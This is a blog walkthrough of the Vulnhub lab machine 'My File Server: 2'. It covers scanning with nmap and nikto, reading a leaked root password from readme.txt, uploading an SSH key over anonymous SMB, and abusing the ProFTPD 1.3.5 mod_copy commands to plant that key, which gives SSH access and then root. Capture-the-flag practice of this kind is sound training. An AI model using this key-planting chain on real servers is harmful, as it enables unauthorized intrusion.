My File Server: 2 Walkthrough Vulnhub

My File Server: 2 Walkthrough Vulnhub | My File Server: 2

In this Articles we are solving another Vulnhub CTF My File Server: 2 is created by Akanksha Sachin Verma you can download here this VM

Description

This boot2root machine is the Second Challenge of “My File Server” series. This is a realistic File Server with some intresting loop holes. As its name, you will get many File Sharing Services and their privileges to play.

Network Scanning

we always start with netdiscover to get the IP of the VM machine

netdiscover

Let’s proceed further with Nmap to scan our target IP to find open ports and services.

nmap -sV 192.168.43.95
My File Server: 2 Walkthrough Vulnhub |My File Server: 2 Vulnhub Writeup

Nmap out is shown our target many port are open different running services We saw FTP’s anonymous login enabled and port 445 was also available for SMB.

Enumeration

We also explore the IP host in the web browser as port 80 has been opened for the HTTP service.

http://192.168.43.95

I chose to run nikto for HTTP weak config listing, and luckily found an entry for readme.txt and open the file using curl command

nikto --url http://192.168.43.95
curl http://192.168.43.95/readme.txt

after ran the curl command we shown output is gave me an password rootroot1 but

My File Server: 2 Walkthrough Vulnhub |My File Server: 2 Vulnhub Writeup

I log in the ssh account but we see publicly permission denies error Now time to generate some ssh keys, thus we used ssh-keygen to generate ssh public keys without password in our local machine.

ssh [email protected]
ssh-keygen -b 2048
My File Server: 2 Walkthrough Vulnhub |My File Server: 2 Vulnhub Writeup

After generating the ssh public key we need to upload the key target machine

smbclient -L 192.168.43.95

I log in the anonymous user smb server and upload the file smbdata drive as a authorized_keys using the following command

smbclient //192.168.43.95/smbdata
cd samba/
put /root/.ssh/id_rsa.pub authorized_keys

We already see nmap output target our target port 2121 is open running proftpd 1.3.5 service I found the mod_copy exploit

searchsploit proftpd 1.3.5

I connect the port 2121 and copy our public ssh key smbdata to smbuser .ssh directory as an authorized_keys

nc -vv 192.168.43.95 2121

site cpfr /smbdata/samba/authorized_keys
site cpto /home/smbuser/.ssh/authorized_keys
My File Server: 2 Walkthrough Vulnhub |My File Server: 2 Vulnhub Writeup

Then I again tried to connect with SSH without password and we successful login with smbuser

ssh [email protected]192.168.43.95

I upgrade the shell using the rootroot1 password we already found the password apache server readme.txt file

id
su root

and finally we found our last flag

id
cd /root
ls
cat proof.txt
My File Server: 2 Walkthrough Vulnhub |My File Server: 2 Vulnhub Writeup
Infosecwarrior CTF 2020 03 / link

About Rahul Gehlaut

Cyber Security Researcher, CTF Player. Tech Blog Writer.

View all posts by Rahul Gehlaut →

One Comment on “My File Server: 2 Walkthrough Vulnhub”

Comments are closed.